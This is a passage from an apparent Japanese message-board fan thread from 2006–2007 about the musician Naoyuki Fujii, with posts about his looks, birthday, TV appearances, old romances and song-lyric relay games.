159 :NO MUSIC NO NAME:2006/09/29(金) 23:05:00 ID:rg/UvM64
でもさ〜あの事務所って個人事務所の株式会社じゃん。
出資して配当もらっていたら、稼ぐのが兄でも正当な収入だよね。
経理でもなんでもないからまったくわからないけどさw

160 :NO MUSIC NO NAME:2006/09/30(土) 18:10:38 ID:D6aArOvt
高杢&鶴久新スレ

【兄と油に】髭・白パラサイト11年目【関わるな】
http://human5.2ch.net/test/read.cgi/uwasa/1159527079/l50

161 :NO MUSIC NO NAME:2006/09/30(土) 18:32:40 ID:sk9mwXW0
>>101
かなり前のレスでごめん。

自称『妻』じゃなくて自称『彼女』なら知ってるよ。
福岡に住んでる女でかなり痛かったw

162 :NO MUSIC NO NAME:2006/09/30(土) 19:27:55 ID:T0WPuWQt
自称「彼女」や
自称「妻」、
言うだけならただですからね。

163 :NO MUSIC NO NAME:2006/10/01(日) 01:25:11 ID:RtTeoYQ3
自称彼女はやる事が凄かったよ
当時、文通の頃で実家に行ってファンの子にお茶出したりとか
事務所にイタ電とかが多くなって尚ちゃんと別れなきゃいけなくなったとか
全部手紙で報告してくるのw

この人と文通してる人多かったはず

164 :NO MUSIC NO NAME:2006/10/01(日) 03:02:43 ID:kBNoLUHq
誰だか分かるような分からないような・・

文通や私設FCの手作り会報がはやったよね。
大阪の有名な尚ちゃんファン、知ってる?
名前を出せば誰でも通じるほどの有名人。
あの人ともう一度連絡取りたいけど
阪神大震災で引っ越されたようで音信不通になりました。

165 :NO MUSIC NO NAME:2006/10/04(水) 21:35:56 ID:1fdMp5fF
最近はどう?

166 :NO MUSIC NO NAME:2006/10/06(金) 01:30:19 ID:1XylT6BU
尚ちゃんの飄々とした感じが好きです。

167 :NO MUSIC NO NAME:2006/10/07(土) 01:24:56 ID:d4qeQK8G
今年もお誕生日ライブやるのかな?

168 :NO MUSIC NO NAME:2006/10/10(火) 07:40:48 ID:6ol1shaS
をい!最近の尚ちゃん、
痩せ過ぎ!
もうちょっと健康的な体型になろうよ。

169 :NO MUSIC NO NAME:2006/10/11(水) 01:35:57 ID:9ep5+b11
尚タンが、また髪伸ばし始めたらどうする?

170 :NO MUSIC NO NAME:2006/10/11(水) 20:39:05 ID:DncvngS6
もし伸ばしてもかっこいいから許す


171 :NO MUSIC NO NAME:2006/10/11(水) 21:42:38 ID:OBsaw2VC


172 :NO MUSIC NO NAME:2006/10/11(水) 21:44:09 ID:OBsaw2VC
原田知世→小泉今日子
意外とお盛んです。尚ちゃん。

173 :NO MUSIC NO NAME:2006/10/11(水) 22:26:17 ID:bGtuFJXK
ほかにもいると思うけどw
結局長くつきあった人と結婚するあたり、超保守的というべきか、
お互い遊びでしかなかったか。

髪を伸ばしたら?今度こそファンやめられるかな?


174 :NO MUSIC NO NAME:2006/10/12(木) 00:26:50 ID:TTGIWtbp
伸ばしたくなるのもわかるような気がする。
髪質がサラサラで
天使のわっかが出来てるもん。

175 :NO MUSIC NO NAME:2006/10/13(金) 01:51:26 ID:0rZipB6a
尚さんの天然ぽいところが大好き。

176 :NO MUSIC NO NAME:2006/10/13(金) 10:24:13 ID:8LB93Tu/
原田知世とどうやって知りあったんだ?
なんか競演したっけ?

177 :NO MUSIC NO NAME:2006/10/13(金) 13:47:11 ID:0rZipB6a
知らない、きっかけは。
でも、当時、女性週刊誌で書かれてたよね。
うっすら記憶が。
キョンの方は、二人が同棲中
キョンが尚さんを送り出している写真を取られて、
それが週刊誌に載った。
見た時、軽くショックを受けた記憶が。

178 :NO MUSIC NO NAME:2006/10/13(金) 14:55:55 ID:sBuQg51g
キョンの方はさー
デビュー当時からキョンに会わせろとうるさかったらしいから
記事を見たときはショックだったが
ほんの少し「良かったね」と思えたもんだ

179 :NO MUSIC NO NAME:2006/10/13(金) 22:34:41 ID:pVubNPgg
実兄の元カノでも平気だったんだね・・・w

180 :NO MUSIC NO NAME:2006/10/13(金) 23:36:01 ID:R0tK7Icf
実の姉妹をアレ姉妹にした人ですからw

181 :NO MUSIC NO NAME:2006/10/13(金) 23:54:31 ID:0rZipB6a
>>180 え?それは知らないな〜
ちなみに、誰姉妹?

182 :NO MUSIC NO NAME:2006/10/14(土) 00:51:01 ID:x3YgRmSN
>>180 それ、知らない
何〜?

183 :NO MUSIC NO NAME:2006/10/14(土) 01:51:28 ID:5UaCDSuC
髪は確かに綺麗だな

184 :NO MUSIC NO NAME:2006/10/14(土) 10:47:22 ID:9psFkx5Q
年のわりには白髪もなさそうだしな。

185 :NO MUSIC NO NAME:2006/10/15(日) 01:22:21 ID:0zKMaWzL
痩せてるんで、腰骨が当たって痛そう。

186 :NO MUSIC NO NAME:2006/10/15(日) 21:18:34 ID:bu8I0w1T
夏木マリさんの舞台?を観にいった姐さんはいないのかな?
ウチのあたりじゃないんで、すごく残念・・・。

187 :NO MUSIC NO NAME:2006/10/16(月) 00:38:47 ID:JGpkUneg
尚ちゃん、愛してるよ!

188 :NO MUSIC NO NAME:2006/10/17(火) 00:28:35 ID:ToXFmJiy
尚タソってエチーうまそうだよね。
いや、なんとなく


189 :NO MUSIC NO NAME:2006/10/17(火) 07:00:05 ID:lxvIC37t
↑これ、私があっちに書いた書き込みw

190 :NO MUSIC NO NAME:2006/10/18(水) 00:23:09 ID:5GfG0ht/
尚タン、本当にかわいかったなぁ〜。

191 :NO MUSIC NO NAME:2006/10/19(木) 00:59:26 ID:sH7RKkX2
明日、DVDが届くので楽しみ。

192 :NO MUSIC NO NAME:2006/10/20(金) 21:49:29 ID:powvw/N+
私は、尚タソをヒイヒイ言わせてみたい http://www.mxtv.co.jp/ulala/theme.html
http://angel.ap.teacup.com/nozomi_nakayama/img/1160906467.jpg

193 :NO MUSIC NO NAME:2006/10/21(土) 00:24:36 ID:CCdpY794
私は尚ちゃんとは
キスまででいいな

194 :NO MUSIC NO NAME:2006/10/24(火) 16:56:11 ID:PNkcFr4A
キスといえば「Song For USA」での
浅野温子とのキス&ベッドシーンは
当時中学生だったあたいには衝撃的だった。

195 :NO MUSIC NO NAME:2006/10/28(土) 00:29:34 ID:2YA2ec23
思い出したけど「シャボン玉ホリデー」で知世と共演してるな。

196 :NO MUSIC NO NAME:2006/10/28(土) 00:36:17 ID:+ZnknxhN
今日、「知っとこ」に尚ちゃん出るって。

197 :NO MUSIC NO NAME:2006/10/28(土) 15:47:27 ID:BiUNEyQX
>>195
すげー!!よく思い出したね!
そう言われてもそうだったかなー?そんな気もするなー
ってぐらいしか覚えていません・・・orz
ビデオ探そっと

あ、私も尚ちゃんとはキスまででいいな
やっぱり私にとっちゃあ王子様なのかなw

198 :NO MUSIC NO NAME:2006/10/28(土) 22:11:52 ID:DxAP6sP0
http://www.youtube.com/watch?v=VZPWHTyzs7s
http://www.youtube.com/watch?v=D7LSujsfnbU

199 :NO MUSIC NO NAME:2006/10/28(土) 23:12:05 ID:ebe70Ix6
>>196
ビデオしながらちょこちょこ見ていたんだけど、
尚ちゃん割とよく振ってもらっていたね。
はじめて見たんだけど、ゲスト扱いしてもらっていたのかな。

200 :NO MUSIC NO NAME:2006/11/04(土) 02:35:14 ID:p1VHCf15
硬式にお困りの人がいるんだが、入会の用紙の事け?
その辺のヲタに頼めば簡単に手に入ると思うがww

201 :NO MUSIC NO NAME:2006/11/08(水) 03:01:41 ID:xrsbQ2jN
会員SNSってまだ準備中なんだね
8月からって聞いてたのにもう11月

202 :NO MUSIC NO NAME:2006/11/10(金) 00:57:03 ID:HXKUpc/3
来世で尚ちゃんと結ばれたい。

203 :NO MUSIC NO NAME:2006/11/12(日) 12:28:02 ID:2dpA6cgz
来世では、外見は尚だけど、中身は髭白だったらどする?ww

204 :NO MUSIC NO NAME:2006/11/12(日) 13:14:18 ID:9BhJ5OEu
あの二人の中身はもはや修復不可能なので、
いくら外見が尚でもヤダw

205 :名無しさん@お腹いっぱい。:2006/11/12(日) 21:15:57 ID:IHLQRG82
外見が尚なくらいじゃカバーできないよねw
逆はもっとイヤだが。

206 :NO MUSIC NO NAME:2006/11/15(水) 01:28:31 ID:6+YGYNO0
尚ちゃんの彼女になりたい。

207 :NO MUSIC NO NAME:2006/11/16(木) 17:03:26 ID:M6ZjoMi0
漏れは尚の母になりたいw

208 :NO MUSIC NO NAME:2006/11/18(土) 18:01:34 ID:MJ3R+/QX
娘に生まれて甘えたい〜
抱っこされてチュッチュしたい。

209 :NO MUSIC NO NAME:2006/11/19(日) 14:24:43 ID:d/MlYIC+
キモい

210 :NO MUSIC NO NAME:2006/11/20(月) 20:04:07 ID:9XQVwT3Q
アブラライブ、ビール1杯で済ませてたぞ?
前後で飲んだかもしれんが。

何が彼を変えたんだ?反省したのか?

211 :NO MUSIC NO NAME:2006/11/20(月) 21:31:44 ID:fSW6CqKl
>>210
いまや伝説と化した「OIL SHOCK@横浜」
の反省したんじゃない?
相当飲んでてベロンベロンだったと聞く。
しかも、「山下 達郎」がライブに来てたらしいのに…

212 :NO MUSIC NO NAME:2006/11/21(火) 15:25:12 ID:FOK24VKB
>>211
>相当飲んでてベロンベロンだった
正確には「ビールにテキーラ混ぜて飲んでベロンベロン」だw

本編後終盤〜アンコは音になってなかったし段取り全部無視でゴキゲンに暴走だった。
アンコの記憶ないらしいしww
よっぽど怒られたか反省したんだろうね。
あれ以降のソロでも本編は飲んでない。
アンコールで出てきたときにはギネスもってたがw

213 :NO MUSIC NO NAME:2006/11/21(火) 22:24:20 ID:rmQzVfa5
多少の酒がなければ本来の尚タソではないのになあ

アブラDVDで横浜終演後がチラと収録されていたが
尚タソはいつからパンツをはくようになったんだ?

214 :NO MUSIC NO NAME:2006/11/21(火) 22:32:12 ID:T36BfoDC
人前で脱ぐときははいてるとか言っていなかったか?

>>212
宮崎でもビールに混ぜ物があったらしいけど、
ソレはアルマジロに当たったそうだ。

215 :NO MUSIC NO NAME:2006/11/21(火) 23:38:33 ID:FOK24VKB
212でつ。

>>214
宮崎行ってきますたw
混ぜ物入りのビールを味見した尚タソ、
「普通にビールだと思うんだけど」
・・・酒と香辛料の摂りすぎで味覚にやや不安ありなのかとw

他にもスタッフのイタズラがあったりでオモロかった。
尚タソも終始ニコニコで萌えだったよ

216 :NO MUSIC NO NAME:2006/11/22(水) 23:52:43 ID:8MdcAIRZ
尚タソがノーパン主義だと初めて知った
なんか複雑...

217 :NO MUSIC NO NAME:2006/11/23(木) 11:06:38 ID:MlzB0SiF
今は違うから安心シルww

ロンドンから帰ってきた頃だからもう10〜2年くらい?前の話だ。
「最近は穿いてます」ってインタビウで答えてた時からも相当年数経っとるがな。

218 :名無しさん@お腹いっぱい。:2006/11/23(木) 14:18:38 ID:aZdlDGiR
また脱いでるかもねw

219 :NO MUSIC NO NAME:2006/11/24(金) 00:17:11 ID:mtzzRg58
なんでノーパン主義になったか、知りたい。

220 :NO MUSIC NO NAME:2006/11/24(金) 02:22:16 ID:XoBfAVaP
尚のノーパンネタを知らないヤシは今まで何やってたの?

221 :NO MUSIC NO NAME:2006/11/24(金) 23:24:45 ID:kk1sBVTB
@最近尚タソの存在を思い出した
A最近ファンになった
Bまだらボケの一種

尚タソを今好きならいいんじゃないかw

222 :NO MUSIC NO NAME:2006/11/25(土) 02:18:05 ID:jE6hTS02
本家、閉鎖してた…。

223 :NO MUSIC NO NAME:2006/11/25(土) 10:31:23 ID:1rMROPZu
SNS開設した関係の不具合だと思うが。
どこまでも手回しの悪いことだ・・・。

224 :NO MUSIC NO NAME:2006/11/30(木) 13:58:17 ID:+mbg5bfa
保守

225 :NO MUSIC NO NAME:2006/12/01(金) 12:33:23 ID:3CSfgvYv
今月は、お誕生日があるね。

226 :NO MUSIC NO NAME:2006/12/02(土) 02:23:59 ID:NaFo2cYm
ネタがないんだね。
マルチまでして虚しいね。

227 :NO MUSIC NO NAME:2006/12/03(日) 00:14:43 ID:Yu2S4Tbk
まあ、確かに誕生日くらいしか話題がない。

228 :NO MUSIC NO NAME:2006/12/04(月) 00:49:13 ID:CLgm5MlW
尚ちゃんと結婚したい。

229 :NO MUSIC NO NAME:2006/12/05(火) 00:29:16 ID:2hpGAkxa
芸者カツラを被り、
淡々と酒を飲む尚タソ。
見てみたいような、
やっぱりやめておきたいような。

230 :NO MUSIC NO NAME:2006/12/06(水) 23:59:45 ID:ms/yxoV7
尚タンて、不倫した事あるのかな?

231 :NO MUSIC NO NAME:2006/12/12(火) 00:16:20 ID:c3OxfrUr
尚ちゃんとデートしたい。

232 :NO MUSIC NO NAME:2006/12/12(火) 22:13:16 ID:aJGXTykv
ロンハーに?


233 :NO MUSIC NO NAME:2006/12/13(水) 00:17:11 ID:hAELWsVK
尚タソとお喋りしてみたい。

234 :NO MUSIC NO NAME:2006/12/14(木) 02:49:06 ID:t2Ayk1m5
尚ちゃんとキスしたい。

235 :NO MUSIC NO NAME:2006/12/15(金) 00:44:59 ID:N2Jjd+xz
尚ちゃんて、髪が伸びるの早くないですか?
エチーのかな。

236 :NO MUSIC NO NAME:2006/12/16(土) 23:12:04 ID:8OHBTOFH
尚ちゃん、かっこいいからいいのマ

237 :名無しさん@お腹いっぱい。:2006/12/17(日) 13:36:22 ID:h91Ja6SK
>>232
やっとわかったw
彼らのノリは苦手なんだが、見てみよう・・・。

238 :NO MUSIC NO NAME:2006/12/19(火) 03:27:12 ID:8pozYzFd
尚ちゃんの子供って
見てみたいと思う?

239 :NO MUSIC NO NAME:2006/12/19(火) 13:48:03 ID:ZWldLOh6
>>237
232じゃないが、その日のロンハーはSPらしい。
レギュラー女性陣が楽器演奏するらしいから、そのサポ出演ではと勝手に想像。

240 :NO MUSIC NO NAME:2006/12/20(水) 00:33:05 ID:r58Zjh1K
あと一週間だすね

241 :NO MUSIC NO NAME:2006/12/22(金) 01:11:06 ID:tJyGK8N4
先日、Lonely Soldierを聴き、打ちのめされました。
最近、強烈に興味を持ち始めたのですが、
お勧めの曲、まずこのアルバムは黙って聴いておけ…等など
ありましたら、コソーリ教えて下さい。 よろしくお願いします。

あと、今月27日、23時からBS-FUJIで、「ゆるりふわり」と言う
ライブの模様が放送される様ですね。楽しみにしています。

242 :NO MUSIC NO NAME:2006/12/24(日) 10:57:51 ID:H9tOuJVl
あなたの趣味によります。
バラード系が好きならチェ時代やF-BLOODがいいかもしれない。
私は今はインストを一番聞いているので参考にならないと思うw

243 :NO MUSIC NO NAME:2006/12/24(日) 21:16:35 ID:kgTP/dqo

つ【教祖誕生】


244 :NO MUSIC NO NAME:2006/12/25(月) 01:03:11 ID:8/45jpKE
あと、二日。

245 :NO MUSIC NO NAME:2006/12/26(火) 01:19:44 ID:+lQOuh5H
BSで聞いて気に入った曲があれば、それが入ってるアルバムから入るのがいんじゃない?

246 :NO MUSIC NO NAME:2006/12/26(火) 06:28:12 ID:H53huzyv
明日は尚タソの誕生日。

247 :NO MUSIC NO NAME:2006/12/26(火) 21:06:17 ID:iEL2hCyu
尚ちゃん、ロンハー出てる!!カッコイイなぁ。

248 :NO MUSIC NO NAME:2006/12/26(火) 21:36:35 ID:H53huzyv
観た観た!かっこいいよね。ちょっと渋くもあるし。
白い服が眩しい。

249 :NO MUSIC NO NAME:2006/12/26(火) 22:48:53 ID:otd4Ws/G
尚之さん、カッコイイですね。ロンハー見て興味もちました。
CD聴いてみようかな。

250 :NO MUSIC NO NAME:2006/12/27(水) 01:07:43 ID:7ysFD4vh
はぴばすで

251 :NO MUSIC NO NAME:2006/12/27(水) 01:41:06 ID:8aZ/DvS0
ロンハーの尚ちゃん良かったねぇ
始終ニコニコして皆を見守ってて大人〜って感じがしたよ

252 :NO MUSIC NO NAME:2006/12/27(水) 03:50:32 ID:PKc4maFI
尚ちゃん誕生日おめでとうゥいくつになってもカッコイイな。

253 :NO MUSIC NO NAME:2006/12/27(水) 03:56:33 ID:7ZqabscS
約15年ぶりに尚たん見ましたvいい男になったね〜

尚たんハピバ゚*。:゚ヾ(*^-^*)ノ*;。・゚

254 :NO MUSIC NO NAME:2006/12/27(水) 04:16:25 ID:jOV1P7vV
尚ちゃん、お誕生日、おめでとう☆☆☆

255 :NO MUSIC NO NAME:2006/12/27(水) 10:39:14 ID:Urhm0W9x
今なるともで紹介されてた。
42歳か〜〜!!
やっと顔に年が追いついてきた、って感じかなぁw

256 :NO MUSIC NO NAME:2006/12/27(水) 23:17:47 ID:jOV1P7vV
えっ、↑って老けてるって事?
ちょっとショック...

257 :NO MUSIC NO NAME:2006/12/29(金) 02:59:09 ID:GskSnOTd
尚ちゃんも、たくさんの人に愛されて
幸せだよね。

258 :NO MUSIC NO NAME:2006/12/30(土) 02:45:50 ID:9dLubXig
>>257 本当だよね。
アブログにも、尚ちゃんへの「おめでとう」コメントがたくさん書かれてたよ。

259 :NO MUSIC NO NAME:2006/12/31(日) 00:05:12 ID:4ZNAdiu8
人柄が出てるよね。尚ちゃんて。

260 :NO MUSIC NO NAME:2006/12/31(日) 16:17:27 ID:zWyaNMQ4
性格が、メッチャ良さそう。

261 : 【大吉】 【824円】 :2007/01/01(月) 00:41:52 ID:d/sCdp75
今年も尚ちゃんにとって良い年であります様に☆

262 :NO MUSIC NO NAME:2007/01/02(火) 01:28:19 ID:cNV9fajd
♪メタリックの車で
どこか遠くへ行こう

263 :NO MUSIC NO NAME:2007/01/02(火) 16:27:53 ID:bQb4uFoa
飛ばせるだーけ飛ばしーて
見知らぬまーちかどで くーらそうよ…

カモン!家紋!!嘉門!!!


264 :NO MUSIC NO NAME:2007/01/03(水) 22:23:46 ID:VyqOWelk
♪ぼくは あの雲になって
君に会いに行く

265 :NO MUSIC NO NAME:2007/01/04(木) 13:15:02 ID:Pc9IyAne
♪半年ぶりだね。悩みない笑顔

266 :NO MUSIC NO NAME:2007/01/05(金) 02:15:53 ID:64or6Jqa
♪もしも時が戻るのなら
僕は運命に背を向けて
君だけを守るために生きて行くよ

267 :NO MUSIC NO NAME:2007/01/05(金) 11:47:56 ID:hRiAmB1r
♪ボンネットに腰掛けて
揺れる金のポニーテール

268 :NO MUSIC NO NAME:2007/01/05(金) 13:04:27 ID:jysZoaV6
↑これクロベエの曲!!
尚ちゃんじゃないよ。

269 :NO MUSIC NO NAME:2007/01/05(金) 14:01:14 ID:JbHibe1c
酒なんていらねぇ

270 :NO MUSIC NO NAME:2007/01/06(土) 04:39:10 ID:i36+mBPL
Naturally 自然に抱き合えばいい

271 :NO MUSIC NO NAME:2007/01/06(土) 10:55:35 ID:Ku/LGPg5
♪I'll kiss you もし君が
 機械仕掛けでも 僕はかまわない

272 :NO MUSIC NO NAME:2007/01/07(日) 01:15:28 ID:QLTTug46
♪ブランド身にまとい
奴らが街をゆく


273 :NO MUSIC NO NAME:2007/01/07(日) 01:33:15 ID:EbG8/S8g
♪ああ、荒野のウルフ 毎日が祭騒ぎだった

274 :NO MUSIC NO NAME:2007/01/07(日) 15:07:27 ID:9DgLoHwV
♪結局1日なにもしないでビールを飲んでた〜

275 :NO MUSIC NO NAME:2007/01/08(月) 01:08:41 ID:+ofFFIgF
♪シカゴへ行くトラック
見つけて出かけるつもり
アメリカを探す旅に

276 :NO MUSIC NO NAME:2007/01/08(月) 06:26:01 ID:ygYBjaUP
♪さよならを言うほど 二人は野暮じゃないさ

277 :NO MUSIC NO NAME:2007/01/08(月) 13:16:46 ID:6IfViX0u
♪水晶の橋をかけよう
胸と胸の隙間 叩いてもひび割れぬほど 僕の愛はかたい

278 :NO MUSIC NO NAME:2007/01/08(月) 17:17:24 ID:qjIJkFpR
♪枯葉が道にこぼれ ラジオの歌がとぎれ
何処かで河があふれ 帰りはつらくなるね

279 :NO MUSIC NO NAME:2007/01/08(月) 22:34:05 ID:ygYBjaUP
♪もう見上げる空もいらなくなった
しょうがないさ 君なしじゃ

280 :NO MUSIC NO NAME:2007/01/09(火) 00:11:51 ID:kpLX8bFB
♪やさしい僕のクロ犬が口笛で踊る

281 :NO MUSIC NO NAME:2007/01/10(水) 22:15:14 ID:p9Rt8AgA
♪なんかわかんないけど好き

282 :NO MUSIC NO NAME:2007/01/11(木) 00:55:51 ID:f5KeaOjo
「全部、自分の彼女みたいなものですからね。
セールスとか、売れた売れないに関係なく、自分の作った曲は、みんな可愛いですよ。」

283 :NO MUSIC NO NAME:2007/01/12(金) 02:27:37 ID:t56upDQl
口笛を吹きながら〜♪歩きやすい道へ

284 :NO MUSIC NO NAME:2007/01/12(金) 11:17:28 ID:UU3Qbdql
♪肩をよせあいリンゴをかじり

285 :NO MUSIC NO NAME:2007/01/12(金) 13:37:15 ID:xT20ec8q
蜂蜜の蜘蛛の巣がすげい好きだ。

286 :NO MUSIC NO NAME:2007/01/12(金) 20:11:07 ID:phHYVawZ
♪毒の付いた牙で傷つけ合おうぜぇ〜〜

287 :NO MUSIC NO NAME:2007/01/12(金) 21:59:37 ID:5vNBopIW
♪南のボーダーライン 最後の煙草 口にくわえて

288 :NO MUSIC NO NAME:2007/01/14(日) 00:38:17 ID:G3ZTZ7rr
♪ちょっと気取ったシンデレラボーイ

289 :sage:2007/01/16(火) 02:39:13 ID:G747ifH6
そいや昔、兄イの番組のミニドラマにナオタソ出たよne?
ミセスマーメイドをドラマ化したみたいな

290 :NO MUSIC NO NAME:2007/01/16(火) 06:38:07 ID:E+lMI2wx
お兄さん、番組なんて持ってたっけ?

でも、それみたいな〜

291 :NO MUSIC NO NAME:2007/01/16(火) 09:40:13 ID:LHp3tUA1
素敵な恋をしてみたい
だっけ?

292 :NO MUSIC NO NAME:2007/01/16(火) 10:58:46 ID:XT/5rmYV
>>289
その時のビデオ、年末に大掃除してたら見つけたよー!
捨てられなかった・・・www

293 :NO MUSIC NO NAME:2007/01/16(火) 20:48:16 ID:5vx6lLep
鎌倉恋愛委員会じゃね?

294 :NO MUSIC NO NAME:2007/01/16(火) 22:33:06 ID:E+lMI2wx
フジ観てたら、フミヤお兄ちゃん映った
ちらっと。

295 :NO MUSIC NO NAME:2007/01/21(日) 17:53:48 ID:y5619/nf
毎年尚之さんを麻布十番祭りでみかけます

296 :NO MUSIC NO NAME:2007/01/22(月) 16:30:25 ID:gTp0oqGQ
↑ほんとに?

297 :NO MUSIC NO NAME:2007/01/23(火) 22:47:53 ID:s2DGQRW1
行ってみたいね。

298 :NO MUSIC NO NAME:2007/01/25(木) 02:04:25 ID:svz+QRIn
行きましょう!

299 :NO MUSIC NO NAME:2007/01/25(木) 02:20:47 ID:+h0/5hca
よし、行こうじゃないか。

300 :NO MUSIC NO NAME:2007/01/26(金) 01:05:58 ID:ajuuON51
尚ちゃんに会いたい!

301 :NO MUSIC NO NAME:2007/01/26(金) 02:16:36 ID:tD5/IiYO
もちろん私も行きます。

302 :NO MUSIC NO NAME:2007/01/27(土) 01:27:16 ID:vovebMrz
ところで、そのお祭りっていつなの?

303 :NO MUSIC NO NAME:2007/02/02(金) 23:52:50 ID:KhYpMoml
わずかな金目当てに 襲った銀行で

304 :NO MUSIC NO NAME:2007/02/03(土) 02:45:39 ID:Nj8sAaFu
ガードマンを撃ったよ

305 :NO MUSIC NO NAME:2007/02/03(土) 02:54:11 ID:eRz6xbfQ
もう俺の

306 :NO MUSIC NO NAME:2007/02/03(土) 09:48:33 ID:Nj8sAaFu
人生も

307 :NO MUSIC NO NAME:2007/02/03(土) 14:30:03 ID:xeUau8UA
おしまいさ

308 :NO MUSIC NO NAME:2007/02/03(土) 14:44:02 ID:eRz6xbfQ
らなうぇー らなうぇー

309 :NO MUSIC NO NAME:2007/02/03(土) 17:26:04 ID:dGhBXb4y
一目逢うまでは氏ねない

310 :NO MUSIC NO NAME:2007/02/03(土) 17:31:29 ID:dGhBXb4y
一目逢うまでは氏ねない

311 :NO MUSIC NO NAME:2007/02/04(日) 10:38:36 ID:rVdxYRBg
テナーサックス片手に通学する中学生

312 :NO MUSIC NO NAME:2007/02/04(日) 13:24:17 ID:MU1KKOX0
らなうぇー らなうぇー


313 :NO MUSIC NO NAME:2007/02/05(月) 00:29:50 ID:qC2mpe6a
尚ちゃんに会いたい

314 :NO MUSIC NO NAME:2007/02/05(月) 01:06:24 ID:ciIWcWR7
フミヤって性格わるいねんてな。サウンドクリエーターに勤めてた友達から聞いた。昔好きやったからショック

315 :NO MUSIC NO NAME:2007/02/05(月) 23:19:05 ID:WE2tRDZB
どうでもいいですよ。

316 :NO MUSIC NO NAME:2007/02/06(火) 13:20:47 ID:uh0Boas1
尚ちゃんがいい人ならそれでいい。

317 :NO MUSIC NO NAME:2007/02/06(火) 15:24:02 ID:VTsXA34X
兄じゃーーー!

318 :NO MUSIC NO NAME:2007/02/06(火) 22:33:25 ID:PNjGGNob
バチあたりだね〜

319 :NO MUSIC NO NAME:2007/02/06(火) 23:19:59 ID:s7GlXP+B
なんたって、元メンバーがどえらいボーロしてくれたからな。
名も無きいちスタッフの感想なんざまったくもって気にならないw


320 :NO MUSIC NO NAME:2007/02/07(水) 00:51:33 ID:9it2yrv+
尚ちゃんて子犬みたいな顔してると思うのは、私だけですか

321 :NO MUSIC NO NAME:2007/02/07(水) 22:22:39 ID:N4Lzvq55
いいえ

322 :NO MUSIC NO NAME:2007/02/08(木) 00:13:36 ID:4ulhBsKj
柴犬系だと思う。ほめ言葉じゃないんでアレだが。

323 :NO MUSIC NO NAME:2007/02/09(金) 09:33:42 ID:/4csQgfG
柴犬系って、誉め言葉じゃないんだ。
尚ちゃん、まさに柴犬系と思ったんだけど。

324 :NO MUSIC NO NAME:2007/02/09(金) 12:37:13 ID:Z3NexkjG
阿部ちゃんや江口くんが「芸能界39年組」を作ろうとしてるんだってー@いいとも
尚ちゃんも入るのかなぁ?

325 :NO MUSIC NO NAME:2007/02/09(金) 19:26:41 ID:ljaA1pzv
柴犬系って誉め言葉の部類だよね。

326 :NO MUSIC NO NAME:2007/02/09(金) 23:26:34 ID:hVQ+GsTT
322です。
犬に似てる、って誉めてないような気がして。
でも似てるとは思う、うん。

327 :NO MUSIC NO NAME:2007/02/10(土) 03:53:24 ID:Kg8R5BlW
自分は携帯なんだけど、Googleで尚ちゃんのイメージ検索して楽しんでる。

328 :NO MUSIC NO NAME:2007/02/11(日) 01:57:27 ID:Ajqaq/NF
BLOW SESSIONのジャケットで着ている革ジャン、フミヤ氏が海外に行った時の土産だそうだ。


329 :NO MUSIC NO NAME:2007/02/12(月) 06:08:00 ID:A4Tjmvv9
尚ちゃんとお風呂に入ってる夢みちゃった(赤面)

330 :NO MUSIC NO NAME:2007/02/13(火) 00:39:51 ID:4uvxXnui
尚ちゃんに 「いいこ、いいこ」
してあげたい。

331 :NO MUSIC NO NAME:2007/02/13(火) 03:05:03 ID:74NT2sM9
>>330
尚タソはされたくないと思うぞwww

332 :NO MUSIC NO NAME:2007/02/14(水) 00:13:27 ID:feaQ1AUh
>>330->>331の流れにバロスwww

333 :NO MUSIC NO NAME:2007/02/15(木) 00:49:31 ID:jaKlYOKz
タイムマシンに乗って、子供の頃の尚ちゃんを見に行きたい

334 :NO MUSIC NO NAME:2007/02/16(金) 00:59:34 ID:bR+ryqrD
尚ちゃんみたいにポワ〜ンとして、おっとりした男の人、
好き。

335 :NO MUSIC NO NAME:2007/02/16(金) 01:05:32 ID:33Ip1q8+
>>330
>>333-334
毎日ご苦労さん。

336 :NO MUSIC NO NAME:2007/02/16(金) 02:00:52 ID:JVKJc7Ul
尚ちゃんは決してポワ〜ンとしておっとりしてないと思うゾ

337 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:32:14 ID:kc6tSozA
大人として感情表現をコントロールしているだけだと私も思う。
というととってもクールな人みたいでまた違う気がするけどw


338 :NO MUSIC NO NAME:2007/02/17(土) 07:07:39 ID:1Fr62dgZ
尚タンって、犬飼っているのかな?

339 :NO MUSIC NO NAME:2007/02/17(土) 08:51:31 ID:0RiRDusG
尚タソは実は好き嫌いがはっきりしてるんじゃないか。
時には相当な冷酷さを発揮する。
あの騒動の時に最後まで髭白を拒絶したのは尚だとオモ

340 :NO MUSIC NO NAME:2007/02/17(土) 10:56:44 ID:VrxNGbnh
>>339ハゲドウ。
すごく正義感が強いというのか、信念を曲げない感がある人と自分は思ってる。
だからあの騒動の時の強い拒絶も納得だったなー。


341 :NO MUSIC NO NAME:2007/02/17(土) 21:05:45 ID:6AemX/77
あの騒動で、尚タソは断固拒否しただろうと自分も思った。
最初から好き嫌いはしないかもしれないけど、
ひとたび除外した人はきっぱり切り捨てそうだ。
マスコミや世間では兄ってことになってるけど、兄はお人よしそうだもん。

どっちが正しいとか悪いとかじゃなくて。

342 :NO MUSIC NO NAME:2007/02/18(日) 00:33:19 ID:hqUW4MDu
尚ちゃんの頑固さは
眉の辺りに現れている。気がする。

343 :NO MUSIC NO NAME:2007/02/18(日) 12:44:10 ID:ASU31/72
兄はお人好しというより天然じゃない?
で、尚はうまい具合にそんな兄をフォローする性格に育った感じ。

344 :NO MUSIC NO NAME:2007/02/18(日) 13:11:00 ID:CiG1lcFg
兄は天然だけど、引くところは引く。
尚は天然ではないが、下の子だけに我が強い。

345 :NO MUSIC NO NAME:2007/02/18(日) 23:09:47 ID:rgvNBeUw
引けるところは恐ろしいくらい引きまくりじゃね?

温厚が人間が怒ると怖い、と似たような原理で、引かないと決めたときは
てこでも動かない感じがするw

346 :NO MUSIC NO NAME:2007/02/18(日) 23:43:33 ID:6rI7GevR
今の年齢ではもう兄と弟の性格の違い話はどうかと…

347 :NO MUSIC NO NAME:2007/02/18(日) 23:49:22 ID:rgvNBeUw
兄を引き合いには出したけど、
兄や兄との違いに興味があるわけじゃないのは私だけですかw

348 :NO MUSIC NO NAME:2007/02/19(月) 03:32:02 ID:ilBiEtwJ
尚タンて、母性本能をくすぐるタイプっていうか、
なんだかほうっておけない感じがする。
自分が弟のいる長女だから、そんな風に感じるのかな。

349 :NO MUSIC NO NAME:2007/02/19(月) 23:11:18 ID:khNtCu+3
自分は末っ子の長女だけど、年上の皆さんにかまわれている尚タソが
